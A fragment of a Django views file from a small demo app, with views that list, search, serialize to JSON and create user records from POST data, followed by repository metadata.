return render(request, "demo_app/index.html")
def all_json(request):
users = User.objects.all()
users_json = serializers.serialize("json", users)
print (users_json)
return HttpResponse(users_json, content_type='application/json')
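# Note on the payload shape: serializers.serialize("json", users) returns a
# JSON array of objects like {"model": "<app>.user", "pk": ..., "fields":
# {"first_name": ..., "last_name": ..., "email_address": ...}}, so a client
# reads row.fields.first_name rather than row.first_name (field names taken
# from create() below; the exact app/model label depends on the User model).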
def all_html(request):
users = User.objects.all()
return render(request, "demo_app/all.html", {"users": users})
def find(request):
users = User.objects.filter(first_name__startswith=request.POST['first_name_starts_with'])
print(users)
return render(request, "demo_app/all.html", {"users": users})
def create(request):
User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email_address=request.POST['email_address'])
users = User.objects.all()
return render(request, "demo_app/all.html", {"users": users})
|
[
"noreply@github.com"
] |
sec2890.noreply@github.com
|